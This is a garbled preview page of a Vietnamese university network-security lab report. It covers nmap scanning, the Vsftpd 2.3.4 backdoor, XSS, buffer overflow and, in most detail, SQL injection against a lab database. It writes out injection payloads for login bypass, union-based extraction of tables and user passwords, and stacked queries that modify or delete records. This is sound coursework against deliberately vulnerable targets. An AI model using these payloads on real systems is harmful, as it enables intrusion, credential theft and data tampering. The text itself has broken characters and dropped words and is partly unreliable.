BÀI THỰC HÀNH SỐ 2 học phần an toàn mạng

39 4 0
BÀI THỰC HÀNH SỐ 2 học phần an toàn mạng

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

Thông tin tài liệu

BÀI THỰC HÀNH SỐ Học phần: An toàn mạng Nhóm lớp: 01 Tổ thực hành: 01 Họ tên: Phạm Trường Giang Mã sinh viên: B18DCAT063 MỤC LỤC BÀI 1: FOOTPRINT BÀI 2: SCANNING BÀI 3: SYSTEM HACKING 19 BÀI 4: TROJAN VÀ BACKDOOR 20 BÀI 5: CÁC PHƯƠNG PHÁP SNIFFER 21 BÀI 6: TẤN CÔNG TỪ CHỐI DỊCH VỤ DOS 22 BÀI 7: SOCIAL ENGINEERING 23 BÀI 8: HACKING WEB SERVER 24 BÀI 9: WEB APPLICATION HACKING 26 BÀI 10: SQL INJECTION 27 BÀI 11: BUFFER OVERFLOW 37 BÀI 1: FOOTPRINT I Tìm thơng tin domain - Tìm kiếm thông tin domain itvietnam.com sử dụng trang web https://who.is/ - Tra cứu thông tin domain google.com sử dụng trang web https://whois.domaintools.com/ II Tìm thơng tin email - Sử dụng phần mềm 1st Email Address Spider (trang chủ: http://www.123hiddensender.com) - Keyword: vnn.vn BÀI 2: SCANNING I Sử dụng phần mềm nmap - Lấy thông tin từ máy từ xa xác định hệ điều hành máy • nmap -sS -P0 -sV -O - Lấy danh sách máy chủ với cổng mở định nghĩa trước • nmap -p 135 -oG – 192.168.1.5 • nmap -p 445 -oG – 192.168.1.5 BÀI 8: HACKING WEB SERVER - Cấu hình mạng máy victim (Metasploitable2) - Cấu hình mạng máy Kali Linux 24 - Khai thác backdoor Vsftpd v2.3.4 (port 6200) 25 BÀI 9: WEB APPLICATION HACKING XSS Stored 26 BÀI 10: SQL INJECTION Vượt qua khâu xác thực người dùng - Chi tiết file login_error.txt - Nhập liệu cho phép đăng nhập mà khơng cần có đủ username password: o Đăng nhập tự 27 o Đăng nhập vào tài khoản người dùng định o Phân tích câu lệnh SQL thực (hiển thị trang) giải thích kết có ▪ Câu lệnh lấy ghi bảng tbl_users với username = ‘aaaa’ or 1=1 –’ password = ‘today’ Kết 28 đăng nhập thành công với tài khoản người dùng danh sách ▪ Câu lệnh lấy ghi bảng tbl_users với username = ‘david –’ password = ‘today’ Kết đăng nhập thành công với tài khoản người dùng david tồn tài khoản với user Trích xuất liệu từ CSDL - Chi tiết file search_error.txt 29 - Tìm số trường câu truy vấn trang o sam%’ order by ; o sam%’ union select ; 30 - Hiển thị thông tin hệ quản trị CSDL hệ điều hành o ssss' union select '', @@version, - Trích xuất danh sách bảng CSDL o ssss' union select '', name, from sys.objects where type='u'; 31 - Trích xuất danh sách trường bảng o ssss' union select '', a.name, from sys.columns a inner join sys.objects b on a.object_id = b.object_id where b.name='tbl_users'; o Thay tên bảng tbl_users bảng khác có mục để hiển thị danh sách trường bảng 32 - Trích xuất liệu bảng o ssss' union select full_name, username+' '+password, from tbl_users; 33 o Thay tên bảng danh sách trường để trích xuất liệu bảng khác có mục o Trích xuất ghi gồm tất trường từ bảng students có mã sinh viên trùng với mã sv hiển thị tồn thơng tin trích xuất lên hình 34 Thêm, sửa, xố liệu - samsung'; update tbl_users set password='lostmypassword' where username='david'; - samsung'; insert into tbl_users (full_name, username, password) values ('GiantB', 'giant_bee', 'conongratto'); 35 - samsung'; delete from tbl_users where username = 'giant_bee'; 36 BÀI 11: BUFFER OVERFLOW 37 38 ... (Metasploitable2) - Cấu hình mạng máy Kali Linux 12 - Lệnh ping từ Kali Linux sang máy victim - Lệnh ping từ máy victim sang Kali Linux 13 - Cấu hình file scan Nessus - Kết scan máy victim Nessus... trước • nmap -p 135 -oG – 1 92. 168.1.5 • nmap -p 445 -oG – 1 92. 168.1.5 - Tìm tất địa IP hoạt động mạng • nmap -sP 1 92. 168.1.* 10 - Ping dải địa IP • nmap -sP 1 92. 168.1.9- 129 II Sử dụng phần mềm Retina... cmd 22 BÀI 7: SOCIAL ENGINEERING Gửi tin email giả mạo có đính kèm link chứa mã độc 23 BÀI 8: HACKING WEB SERVER - Cấu hình mạng máy victim (Metasploitable2) - Cấu hình mạng máy Kali Linux 24

Ngày đăng: 04/12/2021, 07:39

Hình ảnh liên quan

- Cấu hình mạng máy victim (Metasploitable2) - BÀI THỰC HÀNH SỐ 2 học phần an toàn mạng

u.

hình mạng máy victim (Metasploitable2) Xem tại trang 13 của tài liệu.
- Cấu hình mạng máy Kali Linux - BÀI THỰC HÀNH SỐ 2 học phần an toàn mạng

u.

hình mạng máy Kali Linux Xem tại trang 13 của tài liệu.
- Cấu hình file scan trong Nessus - BÀI THỰC HÀNH SỐ 2 học phần an toàn mạng

u.

hình file scan trong Nessus Xem tại trang 15 của tài liệu.
- Cấu hình mạng máy Kali Linux - BÀI THỰC HÀNH SỐ 2 học phần an toàn mạng

u.

hình mạng máy Kali Linux Xem tại trang 25 của tài liệu.
- Cấu hình mạng máy victim (Metasploitable2) - BÀI THỰC HÀNH SỐ 2 học phần an toàn mạng

u.

hình mạng máy victim (Metasploitable2) Xem tại trang 25 của tài liệu.
▪ Câu lệnh 1 sẽ lấy bản ghi đầu tiên trong bảng tbl_users với username = ‘aaaa’ or 1=1 –’ và password = ‘today’ - BÀI THỰC HÀNH SỐ 2 học phần an toàn mạng

u.

lệnh 1 sẽ lấy bản ghi đầu tiên trong bảng tbl_users với username = ‘aaaa’ or 1=1 –’ và password = ‘today’ Xem tại trang 29 của tài liệu.
▪ Câu lệnh 2 sẽ lấy bản ghi đầu tiên trong bảng tbl_users với username = ‘david –’ và password = ‘today’ - BÀI THỰC HÀNH SỐ 2 học phần an toàn mạng

u.

lệnh 2 sẽ lấy bản ghi đầu tiên trong bảng tbl_users với username = ‘david –’ và password = ‘today’ Xem tại trang 30 của tài liệu.
- Trích xuất danh sách các bảng của CSDL - BÀI THỰC HÀNH SỐ 2 học phần an toàn mạng

r.

ích xuất danh sách các bảng của CSDL Xem tại trang 32 của tài liệu.
o Thay tên bảng tbl_users bằng bảng khác có được ở mục trên để hiển - BÀI THỰC HÀNH SỐ 2 học phần an toàn mạng

o.

Thay tên bảng tbl_users bằng bảng khác có được ở mục trên để hiển Xem tại trang 33 của tài liệu.
o Thay tên bảng và danh sách trường để trích xuất dữ liệu của các bảng khác có được ở mục trên  - BÀI THỰC HÀNH SỐ 2 học phần an toàn mạng

o.

Thay tên bảng và danh sách trường để trích xuất dữ liệu của các bảng khác có được ở mục trên Xem tại trang 35 của tài liệu.
o Trích xuất 1 bản ghi gồm tất cả các trường từ bảng students có mã sinh viên trùng với mã sv của mình và hiển thị toàn bộ thông tin trích  xuất được lên màn hình  - BÀI THỰC HÀNH SỐ 2 học phần an toàn mạng

o.

Trích xuất 1 bản ghi gồm tất cả các trường từ bảng students có mã sinh viên trùng với mã sv của mình và hiển thị toàn bộ thông tin trích xuất được lên màn hình Xem tại trang 35 của tài liệu.

Tài liệu cùng người dùng

Tài liệu liên quan